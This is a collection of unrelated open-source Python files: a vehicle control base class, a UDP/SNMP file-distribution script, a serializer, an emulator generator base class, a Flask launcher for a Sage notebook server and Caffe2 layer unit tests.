none of the fields is populated with `None`, which is what dronekit
does when it has no location information yet.
Returns a boolean indicating whether the `location` is useable.
If an invalid location type is given, then a `TypeError` is raised.
"""
if isinstance(location, LocationLocal):
# Only need to check one field
return location.north is not None
if isinstance(location, LocationGlobalRelative) or isinstance(location, LocationGlobal):
# Check for a coordinate field and altitude field as per dronekit.
return location.lat is not None and location.alt is not None
raise TypeError("Invalid type for location object")
def is_current_location_valid(self):
"""
Check whether the current vehicle location is valid.
"""
return self.is_location_valid(self.location)
@property
def location(self):
"""
Retrieve the current location of the vehicle.
This property returns the location as a `Locations` object with any
number of valid frames, or one of the `LocationLocal`,
`LocationGlobalRelative` or `LocationGlobal` objects.
"""
raise NotImplementedError("Subclasses must implement `location` property")
@property
def speed(self):
"""
Get the speed of the vehicle in m/s relative to its current attitude.
If the speed cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `speed` property")
@speed.setter
def speed(self, value):
"""
Set the speed of the vehicle in m/s relative to its current attitude.
If the speed cannot be set or if the current vehicle mode does not
support setting the speed in this way, ignore the value.
"""
pass
@property
def velocity(self):
"""
Get the velocity in m/s spread out over components of the current frame.
The frame will almost always be north, east and down (NED).
If the velocity cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `velocity` property")
@velocity.setter
def velocity(self, value):
"""
Set the velocity in m/s spread out over components of the current frame.
If the velocity cannot be set or if the current vehicle mode does not
velocity setting the speed in this way, ignore the value.
"""
pass
@property
def attitude(self):
"""
Get the current attitude information of the vehicle.
This property is an Attitude object with `pitch`, `yaw` and `roll`
property fields which are bearings in radians.
If the attitude cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `attitude` property")
def set_yaw(self, heading, relative=False, direction=1):
"""
Set the bearing `heading` of the vehicle in degrees.
This becomes the yaw of the vehicle, the direction in which it is facing
relative to the surface plane.
The `heading` is a bearing, meaning that north is zero degrees/radians,
and the bearings increase counterclockwise.
If `relative` is false, `heading` is the number of degrees off from
northward direction, counterclockwise.
If `relative` is true, the `heading` is still given as a bearing,
but respective to the vehicle's current yaw.
The `direction` gives the direction in which we should rotate:
`1` means clockwise and `-1` is counterclockwise. Other values may be
supported by certain vehicles, and `-1` may be unsupported in certain
modes, such as absolute headings.
If the yaw cannot be changed, ignore the value.
"""
pass
def set_servo(self, servo, pwm):
"""
Set the PWM value of a given `servo` to the given `pwm`.
The `servo` is a `Servo` object with the correct pin number.
The `pwm` must be within the Servo's PWM dety range.
If the vehicle does not support servos, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `set_servo(servo, pwm)`")
def add_attribute_listener(self, attribute, listener):
"""
Add a listener for when a certain vehicle attribute changes.
"""
if attribute not in self._attribute_listeners:
self._attribute_listeners[attribute] = []
if listener not in self._attribute_listeners:
self._attribute_listeners[attribute].append(listener)
def remove_attribute_listener(self, attribute, listener):
"""
Remove a listener for a certain vehicle attribute.
Raises a `KeyError` if the attribute has no listeners.
Raises `ValueError` if the specific `listener` is registered.
"""
listeners = self._attribute_listeners.get(attribute)
if listeners is None:
raise KeyError("Attribute '{}' has no listeners".format(attribute))
listeners.remove(listener)
if len(listeners) == 0:
del self._attribute_listeners[attribute]
def notify_attribute_listeners(self, attribute, value):
"""
Notify all listeners for a specific attribute.
"""
for fn in self._attribute_listeners.get(attribute, []):
fn(self, attribute, value)
def _set_servos(self, servo_pwms):
"""
Set updated PWM values of servos.
Vehicle subclasses must call this method with a dictionary with servo
pin numbers and current PWM values whenever they update servos that are
relevant to the listeners. For example, an update of motor servos may
be left out of updates in case the listeners have no need for them, but
any servos used for distance sensors should be in the dictionary.
"""
self._servos.update(servo_pwms)
self.notify_attribute_listeners('servos', self._servos)
def _make_global_location(self, value):
"""
Convert a `Location` object to a global location.
"""
if isinstance(value, LocationGlobal):
value = LocationGlobal(value.lat, value.lon, value.alt)
elif isinstance(value, LocationLocal):
home_location = self._home_location
if home_location is None:
value = LocationGlobal(value.north, value.east, -value.down)
elif isinstance(self._geometry, Geometry_Spherical):
value = self._geometry.get_location_meters(home_location,
value.north,
value.east,
-value.down)
else:
value = LocationGlobal(home_location.lat + value.north,
home_location.lon + value.east,
home_location.alt - value.down)
elif isinstance(value, LocationGlobalRelative):
home_location = self._home_location
if home_location is not None:
alt = home_location.alt
else:
alt = 0.0
value = LocationGlobal(value.lat, value.lon, alt + value.alt)
return value
| timvandermeij/unmanned-vehicle-tomography | vehicle/Vehicle.py | Python | gpl-3.0 | 17,679 |
from twisted.internet.task import react
from pysnmp.hlapi.twisted import *
import socket
mapper_1 = "10.0.0.1"
mapper_2 = "10.0.0.2"
reducer = "10.0.0.3"
manager = "10.0.0.4"
def file_processing():
file_in = open("test.txt","r")
num_lines = sum(1 for line in file_in)
file_in.close()
file_in = open("test.txt","r")
print num_lines
file1 = ""
file2 = ""
count = 0
for line in file_in:
if count < num_lines/2:
file1+=(line + "\n")
count = count + 1
else:
file2+=(line + "\n")
count += 1
file_in.close()
return file1, file2
def send_file(file1, file2):
port = 1162
sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
len1 = len(file1)
len2 = len(file2)
print len1, len2
buf = 4096
start = 0
while ((start + buf) < len1):
sock.sendto(file1[start:start+buf],(mapper_1, port))
start = start + buf
print start, buf, len1
print (start + buf)<len1
sock.sendto(file1[start:],(mapper_1, port))
start = 0
while ((start + buf) < len2):
sock.sendto(file2[start:start+buf],(mapper_2, port))
start = start + buf
sock.sendto(file2[start:],(mapper_2, port))
sock.close()
def success((errorStatus, errorIndex, varBinds), hostname):
if errorStatus:
print('%s: %s at %s' % (
hostname,
errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex)-1][0] or '?'
)
)
else:
for varBind in varBinds:
print(' = '.join([ x.prettyPrint() for x in varBind ]))
def failure(errorIndication, hostname):
print('%s failure: %s' % (hostname, errorIndication))
def getSysDescr(reactor, hostname):
d = getCmd(SnmpEngine(),
CommunityData('public', mpModel=0),
UdpTransportTarget(('10.0.0.1', 1161)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
#ObjectType(ObjectIdentity('1.3.6.1.2.1.1.3.0')))
d.addCallback(success, hostname).addErrback(failure, hostname)
return d
file1, file2 = file_processing()
send_file(file1, file2)
react(getSysDescr, ['10.0.0.1'])
| hylandnp/CS7012_DISTRIBUTED_PROJECT | manager.py | Python | mit | 2,200 |
from backend import db
from . import models
class UserTypeSerializer:
def serialize(self, user_types):
data=[]
for user_type in user_types:
data.append(
{'id': user_type.id,
'name': user_type.name,
})
return data
| sandroandrade/emile-server | cruds/crud_user_type/serializer.py | Python | gpl-3.0 | 294 |
from abc import ABCMeta, abstractmethod
class Generator(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate(self, system, rom, playersControllers, gameResolution):
pass
def getResolution(self, config):
return config['videomode']
| nadenislamarre/recalbox-configgen | configgen/generators/Generator.py | Python | mit | 275 |
#We don't use sagenb.notebook.run_notebook because we want the server in the same python environment as our app so we have access to the Notebook and Worksheet objects.
#########
# Flask #
#########
import os, random
from guru.globals import GURU_PORT, GURU_NOTEBOOK_DIR
import sagenb.notebook.notebook as notebook
from sagenb.misc.misc import find_next_available_port
import flask_server.base as flask_base
def startServer(notebook_to_use=None, open_browser=False, debug_mode=False):
#notebook_directory = os.path.join(DOT_SAGENB, "sage_notebook.sagenb")
#Setup the notebook.
if notebook_to_use is None:
#We assume the notebook is empty.
notebook_to_use = notebook.load_notebook(notebook_directory)
notebook_to_use.user_manager().add_user('admin', 'admin','rljacobson@gmail.com',force=True)
notebook_to_use.save() #Write out changes to disk.
notebook_directory = notebook_to_use._dir
#Setup the flask app.
opts={}
opts['startup_token'] = '{0:x}'.format(random.randint(0, 2**128))
startup_token = opts['startup_token']
flask_base.notebook = notebook_to_use
#create_app will now use notebook_to_use instead of the provided location.
flask_app = flask_base.create_app(interface="localhost", port=8081,secure=False, **opts)
sagenb_pid = os.path.join(notebook_directory, "sagenb.pid")
with open(sagenb_pid, 'w') as pidfile:
pidfile.write(str(os.getpid()))
#What does this block even do?
import logging
logger=logging.getLogger('werkzeug')
logger.setLevel(logging.WARNING)
#logger.setLevel(logging.INFO) # to see page requests
#logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
port = find_next_available_port('localhost', GURU_PORT)
notebook_to_use.port = port
#MAKE THIS HAPPEN IN flask_base: g.username = session['username'] = 'admin'
if open_browser:
from sagenb.misc.misc import open_page
open_page('localhost', port, False, '/?startup_token=%s' % startup_token)
try:
if debug_mode:
flask_app.run(host='localhost', port=port, threaded=True,
ssl_context=None, debug=True, use_reloader=False)
else:
flask_app.run(host='localhost', port=port, threaded=True,
ssl_context=None, debug=False)
finally:
#save_notebook(flask_base.notebook)
os.unlink(sagenb_pid)
| rljacobson/Guru | guru/RunFlask.py | Python | mit | 2,460 |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hypothesis.strategies as st
import numpy as np
import numpy.testing as npt
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
from caffe2.python import (
layer_model_instantiator,
core,
schema,
workspace,
)
from caffe2.python.layers.layers import (
InstantiationContext,
)
from caffe2.python.layers.tags import Tags
from caffe2.python.layer_test_util import (
LayersTestCase,
OpSpec,
)
from caffe2.python.layers.layers import (
IdList,
set_request_only,
is_request_only_scalar,
)
class TestLayers(LayersTestCase):
def testAddLoss(self):
input_record_LR = self.new_record(
schema.Struct(
('label', schema.Scalar((np.float64, (1, )))),
('prediction', schema.Scalar((np.float32, (2, )))),
('weight', schema.Scalar((np.float64, (1, ))))
)
)
loss_LR = self.model.BatchLRLoss(input_record_LR)
self.model.add_loss(loss_LR)
assert 'unnamed' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.unnamed
)
self.assertEqual(loss_LR, self.model.loss.unnamed)
self.model.add_loss(loss_LR, 'addLoss')
assert 'addLoss' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.addLoss
)
self.assertEqual(loss_LR, self.model.loss.addLoss)
self.model.add_loss(
schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_1')
), 'addLoss'
)
assert 'addLoss_auto_0' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.addLoss_auto_0
)
assert core.BlobReference('loss_blob_1') in self.model.loss.field_blobs()
self.model.add_loss(
schema.Struct(
(
'structName', schema.Scalar(
dtype=np.float32,
blob=core.BlobReference('loss_blob_2')
)
)
), 'addLoss'
)
assert 'addLoss_auto_1' in self.model.loss
self.assertEqual(
schema.Struct(('structName', schema.Scalar((np.float32, tuple())))),
self.model.loss.addLoss_auto_1
)
assert core.BlobReference('loss_blob_2') in self.model.loss.field_blobs()
loss_in_tuple_0 = schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_in_tuple_0')
)
loss_in_tuple_1 = schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_in_tuple_1')
)
loss_tuple = schema.NamedTuple(
'loss_in_tuple', * [loss_in_tuple_0, loss_in_tuple_1]
)
self.model.add_loss(loss_tuple, 'addLoss')
assert 'addLoss_auto_2' in self.model.loss
self.assertEqual(
schema.Struct(
('loss_in_tuple_0', schema.Scalar((np.float32, tuple()))),
('loss_in_tuple_1', schema.Scalar((np.float32, tuple())))
), self.model.loss.addLoss_auto_2
)
assert core.BlobReference('loss_blob_in_tuple_0')\
in self.model.loss.field_blobs()
assert core.BlobReference('loss_blob_in_tuple_1')\
in self.model.loss.field_blobs()
def _test_net(self, net, ops_list):
"""
Helper function to assert the net contains some set of operations and
then to run the net.
Inputs:
net -- the network to test and run
ops_list -- the list of operation specifications to check for
in the net
"""
ops_output = self.assertNetContainOps(net, ops_list)
workspace.RunNetOnce(net)
return ops_output
def testFCWithoutBias(self):
output_dims = 2
fc_without_bias = self.model.FCWithoutBias(
self.model.input_feature_schema.float_features, output_dims)
self.model.output_schema = fc_without_bias
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
fc_without_bias
)
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("UniformFill", None, None),
]
)
mat_mul_spec = OpSpec(
"MatMul",
[
self.model.input_feature_schema.float_features(),
init_ops[0].output[0],
],
fc_without_bias.field_blobs()
)
self.assertNetContainOps(train_net, [mat_mul_spec])
predict_net = self.get_predict_net()
self.assertNetContainOps(predict_net, [mat_mul_spec])
def testSamplingTrain(self):
output_dims = 1000
indices = self.new_record(schema.Scalar((np.int32, (10,))))
sampling_prob = self.new_record(schema.Scalar((np.float32, (10, ))))
sampled_fc = self.model.SamplingTrain(
schema.Struct(
('input', self.model.input_feature_schema.float_features),
('indices', indices),
('sampling_prob', sampling_prob),
),
"FC",
output_dims,
)
self.model.output_schema = sampled_fc
# Check that we don't add prediction layer into the model
self.assertEqual(1, len(self.model.layers))
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
sampled_fc
)
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("UniformFill", None, None),
OpSpec("UniformFill", None, None),
]
)
sampled_fc_layer = self.model.layers[0]
gather_w_spec = OpSpec(
"Gather",
[
init_ops[0].output[0],
indices(),
],
[
sampled_fc_layer._prediction_layer.train_param_blobs[0]
]
)
gather_b_spec = OpSpec(
"Gather",
[
init_ops[1].output[0],
indices(),
],
[
sampled_fc_layer._prediction_layer.train_param_blobs[1]
]
)
train_fc_spec = OpSpec(
"FC",
[
self.model.input_feature_schema.float_features(),
] + sampled_fc_layer._prediction_layer.train_param_blobs,
sampled_fc.field_blobs()
)
log_spec = OpSpec("Log", [sampling_prob()], [None])
sub_spec = OpSpec(
"Sub",
[sampled_fc.field_blobs()[0], None],
sampled_fc.field_blobs()
)
train_ops = self.assertNetContainOps(
train_net,
[gather_w_spec, gather_b_spec, train_fc_spec, log_spec, sub_spec])
self.assertEqual(train_ops[3].output[0], train_ops[4].input[1])
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[
OpSpec(
"FC",
[
self.model.input_feature_schema.float_features(),
init_ops[0].output[0],
init_ops[1].output[0],
],
sampled_fc.field_blobs()
)
]
)
def testBatchLRLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float64, (1,)))),
('prediction', schema.Scalar((np.float32, (2,)))),
('weight', schema.Scalar((np.float64, (1,))))
))
loss = self.model.BatchLRLoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testMarginRankLoss(self):
input_record = self.new_record(schema.Struct(
('pos_prediction', schema.Scalar((np.float32, (1,)))),
('neg_prediction', schema.List(np.float32)),
))
pos_items = np.array([0.1, 0.2, 0.3], dtype=np.float32)
neg_lengths = np.array([1, 2, 3], dtype=np.int32)
neg_items = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6], dtype=np.float32)
schema.FeedRecord(
input_record,
[pos_items, neg_lengths, neg_items]
)
loss = self.model.MarginRankLoss(input_record)
self.run_train_net_forward_only()
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchMSELoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float64, (1,)))),
('prediction', schema.Scalar((np.float32, (2,)))),
))
loss = self.model.BatchMSELoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchSigmoidCrossEntropyLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, (32,)))),
('prediction', schema.Scalar((np.float32, (32,))))
))
loss = self.model.BatchSigmoidCrossEntropyLoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchSoftmaxLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, tuple()))),
('prediction', schema.Scalar((np.float32, (32,))))
))
loss = self.model.BatchSoftmaxLoss(input_record)
self.assertEqual(schema.Struct(
('softmax', schema.Scalar((np.float32, (32,)))),
('loss', schema.Scalar(np.float32)),
), loss)
def testBatchSoftmaxLossWeight(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, tuple()))),
('prediction', schema.Scalar((np.float32, (32,)))),
('weight', schema.Scalar((np.float64, (1,))))
))
loss = self.model.BatchSoftmaxLoss(input_record)
self.assertEqual(schema.Struct(
('softmax', schema.Scalar((np.float32, (32,)))),
('loss', schema.Scalar(np.float32)),
), loss)
@given(
X=hu.arrays(dims=[2, 5]),
)
def testBatchNormalization(self, X):
input_record = self.new_record(schema.Scalar((np.float32, (5,))))
schema.FeedRecord(input_record, [X])
bn_output = self.model.BatchNormalization(input_record)
self.assertEqual(schema.Scalar((np.float32, (5,))), bn_output)
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
]
)
input_blob = input_record.field_blobs()[0]
output_blob = bn_output.field_blobs()[0]
expand_dims_spec = OpSpec(
"ExpandDims",
[input_blob],
None,
)
train_bn_spec = OpSpec(
"SpatialBN",
[None, init_ops[0].output[0], init_ops[1].output[0],
init_ops[2].output[0], init_ops[3].output[0]],
[output_blob, init_ops[2].output[0], init_ops[3].output[0], None, None],
{'is_test': 0, 'order': 'NCHW', 'momentum': 0.9},
)
test_bn_spec = OpSpec(
"SpatialBN",
[None, init_ops[0].output[0], init_ops[1].output[0],
init_ops[2].output[0], init_ops[3].output[0]],
[output_blob],
{'is_test': 1, 'order': 'NCHW', 'momentum': 0.9},
)
squeeze_spec = OpSpec(
"Squeeze",
[output_blob],
[output_blob],
)
self.assertNetContainOps(
train_net,
[expand_dims_spec, train_bn_spec, squeeze_spec]
)
eval_net = self.get_eval_net()
self.assertNetContainOps(
eval_net,
[expand_dims_spec, test_bn_spec, squeeze_spec]
)
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[expand_dims_spec, test_bn_spec, squeeze_spec]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(eval_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(predict_net)
@given(
X=hu.arrays(dims=[5, 2]),
num_to_collect=st.integers(min_value=1, max_value=10),
)
def testLastNWindowCollector(self, X, num_to_collect):
input_record = self.new_record(schema.Scalar(np.float32))
schema.FeedRecord(input_record, [X])
last_n = self.model.LastNWindowCollector(input_record, num_to_collect)
self.run_train_net_forward_only()
output_record = schema.FetchRecord(last_n.last_n)
start = max(0, 5 - num_to_collect)
npt.assert_array_equal(X[start:], output_record())
num_visited = schema.FetchRecord(last_n.num_visited)
npt.assert_array_equal([5], num_visited())
def testUniformSampling(self):
input_record = self.new_record(schema.Scalar(np.int32))
input_array = np.array([3, 10, 11, 15, 20, 99], dtype=np.int32)
schema.FeedRecord(input_record, [input_array])
num_samples = 20
num_elements = 100
uniform_sampling_output = self.model.UniformSampling(
input_record, num_samples, num_elements)
self.model.loss = uniform_sampling_output
self.run_train_net()
samples = workspace.FetchBlob(uniform_sampling_output.samples())
sampling_prob = workspace.FetchBlob(
uniform_sampling_output.sampling_prob())
self.assertEqual(num_samples, len(samples))
np.testing.assert_array_equal(input_array, samples[:len(input_array)])
np.testing.assert_almost_equal(
np.array([float(num_samples) / num_elements] * num_samples,
dtype=np.float32),
sampling_prob
)
def testUniformSamplingWithIncorrectSampleSize(self):
input_record = self.new_record(schema.Scalar(np.int32))
num_samples = 200
num_elements = 100
with self.assertRaises(AssertionError):
self.model.UniformSampling(input_record, num_samples, num_elements)
def testGatherRecord(self):
indices = np.array([1, 3, 4], dtype=np.int32)
dense = np.array(list(range(20)), dtype=np.float32).reshape(10, 2)
lengths = np.array(list(range(10)), dtype=np.int32)
items = np.array(list(range(lengths.sum())), dtype=np.int64)
items_lengths = np.array(list(range(lengths.sum())), dtype=np.int32)
items_items = np.array(list(range(items_lengths.sum())), dtype=np.int64)
record = self.new_record(schema.Struct(
('dense', schema.Scalar(np.float32)),
('sparse', schema.Struct(
('list', schema.List(np.int64)),
('list_of_list', schema.List(schema.List(np.int64))),
)),
('empty_struct', schema.Struct())
))
indices_record = self.new_record(schema.Scalar(np.int32))
input_record = schema.Struct(
('indices', indices_record),
('record', record),
)
schema.FeedRecord(
input_record,
[indices, dense, lengths, items, lengths, items_lengths,
items_items])
gathered_record = self.model.GatherRecord(input_record)
self.assertTrue(schema.equal_schemas(gathered_record, record))
self.run_train_net_forward_only()
gathered_dense = workspace.FetchBlob(gathered_record.dense())
np.testing.assert_array_equal(
np.concatenate([dense[i:i + 1] for i in indices]), gathered_dense)
gathered_lengths = workspace.FetchBlob(
gathered_record.sparse.list.lengths())
np.testing.assert_array_equal(
np.concatenate([lengths[i:i + 1] for i in indices]),
gathered_lengths)
gathered_items = workspace.FetchBlob(
gathered_record.sparse.list.items())
offsets = lengths.cumsum() - lengths
np.testing.assert_array_equal(
np.concatenate([
items[offsets[i]: offsets[i] + lengths[i]]
for i in indices
]), gathered_items)
gathered_items_lengths = workspace.FetchBlob(
gathered_record.sparse.list_of_list.items.lengths())
np.testing.assert_array_equal(
np.concatenate([
items_lengths[offsets[i]: offsets[i] + lengths[i]]
for i in indices
]),
gathered_items_lengths
)
nested_offsets = []
nested_lengths = []
nested_offset = 0
j = 0
for l in lengths:
nested_offsets.append(nested_offset)
nested_length = 0
for _i in range(l):
nested_offset += items_lengths[j]
nested_length += items_lengths[j]
j += 1
nested_lengths.append(nested_length)
gathered_items_items = workspace.FetchBlob(
gathered_record.sparse.list_of_list.items.items())
np.testing.assert_array_equal(
np.concatenate([
items_items[nested_offsets[i]:
nested_offsets[i] + nested_lengths[i]]
for i in indices
]),
gathered_items_items
)
def testMapToRange(self):
input_record = self.new_record(schema.Scalar(np.int32))
indices_blob = self.model.MapToRange(input_record,
max_index=100).indices
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
schema.FeedRecord(
input_record,
[np.array([10, 3, 20, 99, 15, 11, 3, 11], dtype=np.int32)]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 3, 4, 5, 6, 2, 6], dtype=np.int32),
indices
)
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 35, 60, 15, 10, 15], dtype=np.int32)]
)
workspace.RunNetOnce(train_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 8, 9, 5, 1, 5], dtype=np.int32),
indices
)
eval_net = self.get_eval_net()
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 35, 60, 15, 200], dtype=np.int32)]
)
workspace.RunNetOnce(eval_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 8, 9, 5, 0], dtype=np.int32),
indices
)
schema.FeedRecord(
input_record,
[np.array([10, 3, 23, 15, 101, 115], dtype=np.int32)]
)
workspace.RunNetOnce(eval_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([1, 2, 7, 5, 0, 0], dtype=np.int32),
indices
)
predict_net = self.get_predict_net()
schema.FeedRecord(
input_record,
[np.array([3, 3, 20, 23, 151, 35, 60, 15, 200], dtype=np.int32)]
)
workspace.RunNetOnce(predict_net)
indices = workspace.FetchBlob(indices_blob())
np.testing.assert_array_equal(
np.array([2, 2, 3, 7, 0, 8, 9, 5, 0], dtype=np.int32),
indices
)
def testSelectRecordByContext(self):
float_features = self.model.input_feature_schema.float_features
float_array = np.array([1.0, 2.0], dtype=np.float32)
schema.FeedRecord(float_features, [float_array])
with Tags(Tags.EXCLUDE_FROM_PREDICTION):
log_float_features = self.model.Log(float_features, 1)
joined = self.model.SelectRecordByContext(
schema.Struct(
(InstantiationContext.PREDICTION, float_features),
(InstantiationContext.TRAINING, log_float_features),
# TODO: TRAIN_ONLY layers are also generated in eval
(InstantiationContext.EVAL, log_float_features),
)
)
# model.output_schema has to a struct
self.model.output_schema = schema.Struct((
'joined', joined
))
predict_net = layer_model_instantiator.generate_predict_net(self.model)
workspace.RunNetOnce(predict_net)
predict_output = schema.FetchRecord(predict_net.output_record())
npt.assert_array_equal(float_array,
predict_output['joined']())
eval_net = layer_model_instantiator.generate_eval_net(self.model)
workspace.RunNetOnce(eval_net)
eval_output = schema.FetchRecord(eval_net.output_record())
npt.assert_array_equal(np.log(float_array),
eval_output['joined']())
_, train_net = (
layer_model_instantiator.generate_training_nets_forward_only(
self.model
)
)
workspace.RunNetOnce(train_net)
train_output = schema.FetchRecord(train_net.output_record())
npt.assert_array_equal(np.log(float_array),
train_output['joined']())
def testFunctionalLayer(self):
def normalize(net, in_record, out_record):
mean = net.ReduceFrontMean(in_record(), 1)
net.Sub(
[in_record(), mean],
out_record(),
broadcast=1)
normalized = self.model.Functional(
self.model.input_feature_schema.float_features, 1,
normalize, name="normalizer")
# Attach metadata to one of the outputs and use it in FC
normalized.set_type((np.float32, 32))
self.model.output_schema = self.model.FC(normalized, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 3
assert ops[0].type == "ReduceFrontMean"
assert ops[1].type == "Sub"
assert ops[2].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[1].output) == 1
assert ops[1].output[0] in ops[2].input
def testFunctionalLayerHelper(self):
mean = self.model.ReduceFrontMean(
self.model.input_feature_schema.float_features, 1)
normalized = self.model.Sub(
schema.Tuple(
self.model.input_feature_schema.float_features, mean),
1, broadcast=1)
# Attach metadata to one of the outputs and use it in FC
normalized.set_type((np.float32, (32,)))
self.model.output_schema = self.model.FC(normalized, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 3
assert ops[0].type == "ReduceFrontMean"
assert ops[1].type == "Sub"
assert ops[2].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[1].output) == 1
assert ops[1].output[0] in ops[2].input
def testFunctionalLayerHelperAutoInference(self):
softsign = self.model.Softsign(
schema.Tuple(self.model.input_feature_schema.float_features),
1)
assert softsign.field_type().base == np.float32
assert softsign.field_type().shape == (32,)
self.model.output_schema = self.model.FC(softsign, 2)
predict_net = layer_model_instantiator.generate_predict_net(
self.model)
ops = predict_net.Proto().op
assert len(ops) == 2
assert ops[0].type == "Softsign"
assert ops[1].type == "FC"
assert len(ops[0].input) == 1
assert ops[0].input[0] ==\
self.model.input_feature_schema.float_features()
assert len(ops[0].output) == 1
assert ops[0].output[0] in ops[1].input
def testFunctionalLayerHelperAutoInferenceScalar(self):
loss = self.model.AveragedLoss(self.model.input_feature_schema, 1)
self.assertEqual(1, len(loss.field_types()))
self.assertEqual(np.float32, loss.field_types()[0].base)
self.assertEqual(tuple(), loss.field_types()[0].shape)
def testFunctionalLayerInputCoercion(self):
one = self.model.global_constants['ONE']
two = self.model.Add([one, one], 1)
self.model.loss = two
self.run_train_net()
data = workspace.FetchBlob(two.field_blobs()[0])
np.testing.assert_array_equal([2.0], data)
def testFunctionalLayerWithOutputNames(self):
k = 3
topk = self.model.TopK(
self.model.input_feature_schema,
output_names_or_num=['values', 'indices'],
k=k,
)
self.assertEqual(2, len(topk.field_types()))
self.assertEqual(np.float32, topk.field_types()[0].base)
self.assertEqual((k,), topk.field_types()[0].shape)
self.assertEqual(np.int32, topk.field_types()[1].base)
self.assertEqual((k,), topk.field_types()[1].shape)
self.assertEqual(['TopK/values', 'TopK/indices'], topk.field_blobs())
def testFunctionalLayerSameOperatorOutputNames(self):
Con1 = self.model.ConstantFill([], 1, value=1)
Con2 = self.model.ConstantFill([], 1, value=2)
self.assertNotEqual(str(Con1), str(Con2))
def testFunctionalLayerWithOutputDtypes(self):
loss = self.model.AveragedLoss(
self.model.input_feature_schema,
1,
output_dtypes=(np.float32, (1,)),
)
self.assertEqual(1, len(loss.field_types()))
self.assertEqual(np.float32, loss.field_types()[0].base)
self.assertEqual((1,), loss.field_types()[0].shape)
def testPropagateRequestOnly(self):
# test case when output is request only
input_record = self.new_record(schema.Struct(
('input1', schema.Scalar((np.float32, (32, )))),
('input2', schema.Scalar((np.float32, (64, )))),
('input3', schema.Scalar((np.float32, (16, )))),
))
set_request_only(input_record)
concat_output = self.model.Concat(input_record)
self.assertEqual(is_request_only_scalar(concat_output), True)
# test case when output is not request only
input_record2 = self.new_record(schema.Struct(
('input4', schema.Scalar((np.float32, (100, ))))
)) + input_record
concat_output2 = self.model.Concat(input_record2)
self.assertEqual(is_request_only_scalar(concat_output2), False)
def testSetRequestOnly(self):
input_record = schema.Scalar(np.int64)
schema.attach_metadata_to_scalars(
input_record,
schema.Metadata(
categorical_limit=100000000,
expected_value=99,
feature_specs=schema.FeatureSpec(
feature_ids=[1, 100, 1001]
)
)
)
set_request_only(input_record)
self.assertEqual(input_record.metadata.categorical_limit, 100000000)
